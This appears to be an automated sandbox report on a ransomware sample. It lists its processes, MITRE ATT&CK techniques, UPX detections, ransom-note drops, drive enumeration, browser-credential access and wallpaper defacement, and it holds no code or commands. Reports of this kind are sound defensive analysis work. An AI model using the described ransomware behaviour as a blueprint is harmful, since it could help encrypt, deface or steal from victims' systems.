941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.exeD22bUU4y.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

pid	process
2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
2868	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
3912	cmd.exe
3936	D22bUU4y.exe
4236	cmd.exe
2708	cmd.exe
1936	cmd.exe
5736	cmd.exe
936	cmd.exe
5172	cmd.exe
5340	cmd.exe
556	cmd.exe
5448	cmd.exe
4312	cmd.exe
2364	cmd.exe
5544	cmd.exe
5196	cmd.exe
5136	cmd.exe
1224	cmd.exe
1992	cmd.exe
5100	cmd.exe
4904	cmd.exe
2072	cmd.exe
1136	cmd.exe
1084	cmd.exe
1608	cmd.exe
2696	cmd.exe
1672	cmd.exe
3236	cmd.exe
3196	cmd.exe
3424	cmd.exe
3252	cmd.exe
1148	cmd.exe
3504	cmd.exe
3148	cmd.exe
1676	cmd.exe
4428	cmd.exe
280	cmd.exe
4564	cmd.exe
4480	cmd.exe
4736	cmd.exe
4580	cmd.exe
4508	cmd.exe
5740	cmd.exe
5240	cmd.exe
3684	cmd.exe
3716	cmd.exe
3736	cmd.exe
2412	cmd.exe
3172	cmd.exe
5748	cmd.exe
3220	cmd.exe
5720	cmd.exe
5708	cmd.exe
4584	cmd.exe
5824	cmd.exe
4208	cmd.exe
4140	cmd.exe
6132	cmd.exe
4228	cmd.exe
2280	cmd.exe
4304	cmd.exe
5880	cmd.exe
824	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
3996	takeown.exe
4732	takeown.exe
4148	takeown.exe
3976
5480	takeown.exe
2020
1532
2040	takeown.exe
3340	takeown.exe
3736	takeown.exe
4276	takeown.exe
3112	takeown.exe
3552
4712
2760
1708	takeown.exe
4932	takeown.exe
4028	takeown.exe
2184
4284	takeown.exe
2072	takeown.exe
1352	takeown.exe
3812
5544	takeown.exe
5876	takeown.exe
5616	takeown.exe
4732
5464	takeown.exe
4800	takeown.exe
5792
3240	takeown.exe
1476	takeown.exe
2240	takeown.exe
692	takeown.exe
3156	takeown.exe
2356	takeown.exe
4708
5148	takeown.exe
4876	takeown.exe
1824	takeown.exe
2984	takeown.exe
5512	takeown.exe
1068	takeown.exe
1996	takeown.exe
1704	takeown.exe
1652	takeown.exe
4820	takeown.exe
5988	takeown.exe
2364	takeown.exe
336	takeown.exe
5816	takeown.exe
2648	takeown.exe
1596	takeown.exe
1092	takeown.exe
1708	takeown.exe
5100
3004	takeown.exe
4032	takeown.exe
3696	takeown.exe
4820	takeown.exe
1580	takeown.exe
4504	takeown.exe
5220	takeown.exe
3612	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe	upx
behavioral11/memory/3936-1353-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2132-5396-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2132-5444-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4404-5963-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3032-6796-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5136-6799-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3672-7013-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2168-6997-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5348-7743-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5384-7747-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5492-7756-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5512-7759-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2952-7768-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1720-7772-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5200-7776-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2356-7780-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1472-7786-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5580-7790-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2200-7796-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1688-7799-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2476-7805-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/796-7808-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/796-7809-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2276-7815-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2636-7824-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2452-7830-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2420-7833-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2168-7841-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1184-7845-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1184-7844-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3496-7850-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3552-7853-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3552-7852-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1692-7859-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1640-7861-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2332-7863-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2720-7870-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5676-7874-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5672-7876-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3360-7878-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3400-7880-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4744-7889-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4040-7891-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4504-7895-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4436-7899-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5552-7904-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5616-7905-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5596-7911-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3768-7917-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3168-7919-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3892-7922-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4160-7924-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5680-7925-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5788-7930-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5816-7931-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5956-7933-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4116-7935-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4216-7936-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4248-7939-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4276-7940-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4292-7942-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2468-7943-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5956-7946-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 40 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P8PFHBEX\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\QY1C4128\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\6ZEZX6DE\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G5DX35ZA\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exeD22bUU4y64.exe

description	ioc	process
File opened (read-only)	\??\V:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	D22bUU4y64.exe
File opened (read-only)	\??\X:	D22bUU4y64.exe
File opened (read-only)	\??\Z:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\W:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	D22bUU4y64.exe
File opened (read-only)	\??\K:	D22bUU4y64.exe
File opened (read-only)	\??\S:	D22bUU4y64.exe
File opened (read-only)	\??\W:	D22bUU4y64.exe
File opened (read-only)	\??\Q:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\N:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	D22bUU4y64.exe
File opened (read-only)	\??\L:	D22bUU4y64.exe
File opened (read-only)	\??\R:	D22bUU4y64.exe
File opened (read-only)	\??\T:	D22bUU4y64.exe
File opened (read-only)	\??\H:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\E:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\A:	D22bUU4y64.exe
File opened (read-only)	\??\H:	D22bUU4y64.exe
File opened (read-only)	\??\J:	D22bUU4y64.exe
File opened (read-only)	\??\Q:	D22bUU4y64.exe
File opened (read-only)	\??\R:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\V:	D22bUU4y64.exe
File opened (read-only)	\??\Y:	D22bUU4y64.exe
File opened (read-only)	\??\G:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\B:	D22bUU4y64.exe
File opened (read-only)	\??\K:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\N:	D22bUU4y64.exe
File opened (read-only)	\??\P:	D22bUU4y64.exe
File opened (read-only)	\??\S:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\P:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\T:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	D22bUU4y64.exe
File opened (read-only)	\??\X:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\U:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\L:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\J:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\E:	D22bUU4y64.exe
File opened (read-only)	\??\U:	D22bUU4y64.exe
File opened (read-only)	\??\Z:	D22bUU4y64.exe
File opened (read-only)	\??\Y:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 myexternalip.com

flow	ioc
6	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mf8QLzo3.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\FreeCell\fr-FR\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Hearts\it-IT\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Regina	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\install.log	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\US_export_policy.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\zi\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Oral	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\management\management.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Prague	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\id.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ssvagent.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Monterrey	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
